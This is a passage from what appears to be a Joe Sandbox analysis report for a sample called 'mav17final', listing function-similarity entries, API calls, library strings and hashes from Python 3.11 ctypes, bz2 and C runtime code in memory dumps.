                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_String
                                                  • String ID: abstract class
                                                  • API String ID: 1259552197-1623945838
                                                  • Opcode ID: 889cc83bd7e42d210c141f1a36b7b4f58b9fb1ebab554f935c723b1e3cc6fbc7
                                                  • Instruction ID: 73399754d464911d4d8e379681cc9ccf8d85222a8905bda3ff562c0dd564ca3a
                                                  • Opcode Fuzzy Hash: 889cc83bd7e42d210c141f1a36b7b4f58b9fb1ebab554f935c723b1e3cc6fbc7
                                                  • Instruction Fuzzy Hash: 51112522A09B8682EA559F19E4543B927A4EF9ABF6F186134CB4D47395DF3CD444C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
                                                  • Instruction ID: 58c3695f7946c2b2eadff518806b82a6e71f9b345b6a23cfd1e3bb92f2e111a6
                                                  • Opcode Fuzzy Hash: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
                                                  • Instruction Fuzzy Hash: A2113A32A08B8282EB208F29E54026977A5FB88BC4F184271EF8D07B68DF3DD5558B40
                                                  APIs
                                                  • PyErr_SetString.PYTHON311 ref: 00007FF8B9F6A185
                                                    • Part of subcall function 00007FF8B9F6AA7C: PyErr_SetString.PYTHON311(?,?,?,?,00007FF8B9F6947D,?), ref: 00007FF8B9F6AABD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String
                                                  • String ID: NULL pointer access$Pointer does not support item deletion
                                                  • API String ID: 1450464846-1262937747
                                                  • Opcode ID: cc63e7bd2d2a3bc22265ebdaaeb10ee6e24a6e51b4ebc2f3b89706aefd929760
                                                  • Instruction ID: 27555848f75128ddf47e4bd96589e05914428eb231fbd092c0121680eeeac60c
                                                  • Opcode Fuzzy Hash: cc63e7bd2d2a3bc22265ebdaaeb10ee6e24a6e51b4ebc2f3b89706aefd929760
                                                  • Instruction Fuzzy Hash: 18016961A08B8681EA44CF5AE8404B97764BF8ABE5B149136DF4D477A5CF3CD540C700
                                                  APIs
                                                    • Part of subcall function 00007FF8B9F6EA24: PyType_IsSubtype.PYTHON311(?,?,?,?,00007FF8B9F6E889), ref: 00007FF8B9F6EA31
                                                  • PyErr_SetString.PYTHON311 ref: 00007FF8B9F6E9C8
                                                    • Part of subcall function 00007FF8B9F6AA7C: PyErr_SetString.PYTHON311(?,?,?,?,00007FF8B9F6947D,?), ref: 00007FF8B9F6AABD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String$SubtypeType_
                                                  • String ID: can't delete attribute$not a ctype instance
                                                  • API String ID: 3320257282-2740123057
                                                  • Opcode ID: 18fbc3005ffdff5a035a76096331e82b7bdea77d6c35e831de142f80868fa9ec
                                                  • Instruction ID: 48dddbb8112aac66719dc6060950480ad4fc5b5d8fa1f1aabaedc347c98c65fa
                                                  • Opcode Fuzzy Hash: 18fbc3005ffdff5a035a76096331e82b7bdea77d6c35e831de142f80868fa9ec
                                                  • Instruction Fuzzy Hash: F0113962A08F8181EB50CF2AE54006967A1FF48BF5B145132EF9D57BA8DF2CE561C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_ItemSequence_String
                                                  • String ID: args not a tuple?
                                                  • API String ID: 138718260-274370407
                                                  • Opcode ID: f981f7e703dfeb18ac4443360c7dfc39ae4566ed3aa42caf66e0419349738e14
                                                  • Instruction ID: e0bdafe0fde352d3699ed9b2997e2ff738e8c394afdc2f90abcff65099f95dda
                                                  • Opcode Fuzzy Hash: f981f7e703dfeb18ac4443360c7dfc39ae4566ed3aa42caf66e0419349738e14
                                                  • Instruction Fuzzy Hash: 8B019E31A08F8285E6408F19E4400697B60FB45FF5F68A231DB6D577A6CF2DD4D1C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_String
                                                  • String ID: Array does not support item deletion$invalid index
                                                  • API String ID: 1450464846-799983634
                                                  • Opcode ID: 67e0225e1662b2c6de7c64aa0e1a7725335fd733c618b52c26417df970fd658a
                                                  • Instruction ID: f439b9ca7988b7275dbc799423bfa6d95f4e4c0f561592bbc10159d9ba24ec00
                                                  • Opcode Fuzzy Hash: 67e0225e1662b2c6de7c64aa0e1a7725335fd733c618b52c26417df970fd658a
                                                  • Instruction Fuzzy Hash: 50014862A08FC681DA40DF5AE8508B82764FF95BE1F516172DB4E573A2DF3DE150C300
                                                  APIs
                                                  • PyErr_SetString.PYTHON311(?,?,?,00007FF8B9F61959), ref: 00007FF8B9F68EE9
                                                    • Part of subcall function 00007FF8B9F63DC0: _PyObject_New.PYTHON311(?,?,?,?,00007FF8B9F646A2,?,?,?,00007FF8B9F61959), ref: 00007FF8B9F63DCB
                                                  • _Py_Dealloc.PYTHON311(?,?,?,00007FF8B9F61959), ref: 00007FF8B9F68EF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocErr_Object_String
                                                  • String ID: expected CData instance
                                                  • API String ID: 3982460303-1581534645
                                                  • Opcode ID: cb84d01ecd15a1eda4d8d1b175decd3e5ebb0d94a1c0848139c17e093e1ac344
                                                  • Instruction ID: ae1bd516b893d0b856b0f4bdf21d1411e30b8d519dba8d713ff9711acff5cfe9
                                                  • Opcode Fuzzy Hash: cb84d01ecd15a1eda4d8d1b175decd3e5ebb0d94a1c0848139c17e093e1ac344
                                                  • Instruction Fuzzy Hash: 92014BA1A48B86C1FB549F6DE84003827A0AF59BEAF282434CB4E477A0DF3DE055C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID: (LLLLLL)$@
                                                  • API String ID: 1890195054-4274804333
                                                  • Opcode ID: f6d853219341f3569f1d192fdd7bc0d9c3c772da8b40e051b4c7c30d58921684
                                                  • Instruction ID: 03e630b533c34b3749f06485aa4f85c2d7dd91121d001f9f164ab851b14d5b08
                                                  • Opcode Fuzzy Hash: f6d853219341f3569f1d192fdd7bc0d9c3c772da8b40e051b4c7c30d58921684
                                                  • Instruction Fuzzy Hash: F101AD75A08BC582EF609F29F45536AB7A0FB99794F404436DB8D83759DF3CD11A8B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AttrEqualGenericObject_StringUnicode_
                                                  • String ID: _fields_
                                                  • API String ID: 947992268-3196300388
                                                  • Opcode ID: c6dedb99678c499afd6badd1b017026620a4ab54dad84f9f25f416736ac5017a
                                                  • Instruction ID: 1f59a7100c68ab966b3e6f9fd0745ea4c15ea6ce132554295c500626c06e103d
                                                  • Opcode Fuzzy Hash: c6dedb99678c499afd6badd1b017026620a4ab54dad84f9f25f416736ac5017a
                                                  • Instruction Fuzzy Hash: 47F0F416B1C7C241E7908F6EE94426A5651AF45FE3F58A130EB5E46798CF2CD891C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_Err_ItemString
                                                  • String ID: abstract class
                                                  • API String ID: 960913676-1623945838
                                                  • Opcode ID: 152bc656983328e65481e0599e2526a4dd7c8e873d35052210cfab64f93eb631
                                                  • Instruction ID: 1526b0dd1531689ca3abf27488437a81f26f86ac1531c993363dc172818d5b9a
                                                  • Opcode Fuzzy Hash: 152bc656983328e65481e0599e2526a4dd7c8e873d35052210cfab64f93eb631
                                                  • Instruction Fuzzy Hash: 08F0A410B0CB8680EA459FBEF89407813A0AF45BF6B186231DB1E463A5DE2CD455C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_$KeywordsPositional
                                                  • String ID: BZ2Decompressor
                                                  • API String ID: 1300771297-1337346095
                                                  • Opcode ID: 358a44a62b11731d470d0bbb96af668936168ddb6404ce11f0731b6ca31f1a24
                                                  • Instruction ID: 8e7a13a25e7da37baac3bfeadf28ece4cd7544117d59f6e26c975a7f58fd7d57
                                                  • Opcode Fuzzy Hash: 358a44a62b11731d470d0bbb96af668936168ddb6404ce11f0731b6ca31f1a24
                                                  • Instruction Fuzzy Hash: 1FF06D21B2C7C342FE549F2AA984135A2B1AF44BD0B584230EB2D97A98DF1CE84E8700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditBytes_FromSizeStringSys_
                                                  • String ID: ctypes.string_at
                                                  • API String ID: 1783689829-1910480597
                                                  • Opcode ID: ad0ccf7f71804dd0e038b4a23bae58c0fa799e11b1e17efbe4fa3c6d44ce38ba
                                                  • Instruction ID: e3a6e6372e402155a8935afc87d8a4333e18899fcc9b2c815d571b5c2a94d9f0
                                                  • Opcode Fuzzy Hash: ad0ccf7f71804dd0e038b4a23bae58c0fa799e11b1e17efbe4fa3c6d44ce38ba
                                                  • Instruction Fuzzy Hash: 69F03AA1B08AC281FB604F2AE9421782A519F55BF6F24A335CBBE827D4DE2CD184D204
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditCharFromSys_Unicode_Wide
                                                  • String ID: ctypes.wstring_at
                                                  • API String ID: 614261396-2169766756
                                                  • Opcode ID: c82b687e7251797f6e5b90717e26ccc800462a1ff5413f444b11774fb9a74885
                                                  • Instruction ID: 180d70d14de3b6a3951f05234e41e97e2fabe105b5343bd5f75e93c063ffa1a9
                                                  • Opcode Fuzzy Hash: c82b687e7251797f6e5b90717e26ccc800462a1ff5413f444b11774fb9a74885
                                                  • Instruction Fuzzy Hash: 49F05E51B18A8291EE544F69F9520B96620AF08BF6B486335DB7E863E0EE6CE154C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FromLong_Ssize_t
                                                  • String ID: this type has no size
                                                  • API String ID: 168540982-982649334
                                                  • Opcode ID: 6f14cdcc885872a6a1df23694bcedff85d145f2805944da9bd946685c2c050ae
                                                  • Instruction ID: 096b5566669a33b36226922fa24d5bf5cf56f4f6cdb3773816132aa03eff705d
                                                  • Opcode Fuzzy Hash: 6f14cdcc885872a6a1df23694bcedff85d145f2805944da9bd946685c2c050ae
                                                  • Instruction Fuzzy Hash: 3CF0C091F19B8391FE549F6AD85107827609F89FE6F182031CF0E863AADE2CF484C350
                                                  APIs
                                                    • Part of subcall function 00007FF8BA24F050: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8BA24F110
                                                    • Part of subcall function 00007FF8BA24F050: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8BA24EE15), ref: 00007FF8BA24F15F
                                                    • Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE
                                                  • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24EE3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwindabortterminate
                                                  • String ID: csm$f
                                                  • API String ID: 4189928240-629598281
                                                  • Opcode ID: 41dc89b1ce5f079b65ce2aaee024a8a434243f0f20765bf48ba2e403aae6c5bc
                                                  • Instruction ID: 101a6dd11fd41e53f98f1f0b17a6c374f9a1187447936664239e22e3b01d8fbf
                                                  • Opcode Fuzzy Hash: 41dc89b1ce5f079b65ce2aaee024a8a434243f0f20765bf48ba2e403aae6c5bc
                                                  • Instruction Fuzzy Hash: 2EE09B31D0835381FB206B65B28517D26A5EF49FE4F1891B4DF8806646CF7ED9949601
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: PrintableUnicode_
                                                  • String ID: '$\
                                                  • API String ID: 1291510985-1366717710
                                                  • Opcode ID: 8f056e593a683e8d15de34f78a6f47cb157d5505191b12e7d535d23602ebe9e6
                                                  • Instruction ID: f2513007a45b34acf1eeda375f14e33c4f7538b518fe007d57dbdfdeed20f924
                                                  • Opcode Fuzzy Hash: 8f056e593a683e8d15de34f78a6f47cb157d5505191b12e7d535d23602ebe9e6
                                                  • Instruction Fuzzy Hash: A9E04F21F18B8546FB641E2DED8427522925BA53F2F4E2131DB99053D9CD2CD881A714
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FormatFromUnicode_
                                                  • String ID: <Field type=%s, ofs=%zd, size=%zd>$<Field type=%s, ofs=%zd:%zd, bits=%zd>
                                                  • API String ID: 3889672380-2914491812
                                                  • Opcode ID: 08e4dafb61acecda0dd77ce9d4e7f7947246ca23280beaed436fd91f997484e9
                                                  • Instruction ID: e67b0e936adf2c69a2f4edf01d2732dec0990640da6c2d58345962f70742a1d8
                                                  • Opcode Fuzzy Hash: 08e4dafb61acecda0dd77ce9d4e7f7947246ca23280beaed436fd91f997484e9
                                                  • Instruction Fuzzy Hash: 97E0E566B04E82D2DA548F0DE8404A83B60FB56BA9BA50126CB4C03370CF3CD5AAC750
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$OccurredString
                                                  • String ID: PyObject is NULL
                                                  • API String ID: 114435612-3221357749
                                                  • Opcode ID: 2e5002b93a88984c719b4076089918ef8885b05004490f6185a51e22d0327163
                                                  • Instruction ID: 27505ec19bb24dfb1793d154a13e93e3875fc157042bf4f7430bea54ecf81395
                                                  • Opcode Fuzzy Hash: 2e5002b93a88984c719b4076089918ef8885b05004490f6185a51e22d0327163
                                                  • Instruction Fuzzy Hash: 6DE0BF11B09A83A5EE445F1DD84013427A0AF49BF7F645439CB0E46360DF2CA055C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Capsule_FreeMem_Pointer
                                                  • String ID: _ctypes/cfield.c pymem
                                                  • API String ID: 1268649101-2578739719
                                                  • Opcode ID: 13f5c1952ace5f4f8c9f181e4b2ebf5f0c2b934a391285e14cb501e27f568ab5
                                                  • Instruction ID: f91d566f97c2777f67eaa8d3eb0748db5528ea0def0e1e99b1e0b08b22718c95
                                                  • Opcode Fuzzy Hash: 13f5c1952ace5f4f8c9f181e4b2ebf5f0c2b934a391285e14cb501e27f568ab5
                                                  • Instruction Fuzzy Hash: 23C00250F1AB8292ED88AF59EC8613417606F49BAAF981438C60D15360EEACA59AC710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Capsule_FreeMem_Pointer
                                                  • String ID: _ctypes pymem
                                                  • API String ID: 1268649101-201515578
                                                  • Opcode ID: 62ef90d10503a54e82f353289ff9a1ab72bad7d0f7bb64e3368930f79f513158
                                                  • Instruction ID: fb6cfb0e49bac64e0558dec66497e927ca49432cdf951de1ac2a5451a09e7503
                                                  • Opcode Fuzzy Hash: 62ef90d10503a54e82f353289ff9a1ab72bad7d0f7bb64e3368930f79f513158
                                                  • Instruction Fuzzy Hash: 10C00210E1ABC282ED88AF19EC8557417A0AF55BABF881438C70E16360EE2CA5A9D710
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,00007FF8BA246859,?,?,?,?,00007FF8BA24FF42,?,?,?,?,?), ref: 00007FF8BA2469FB
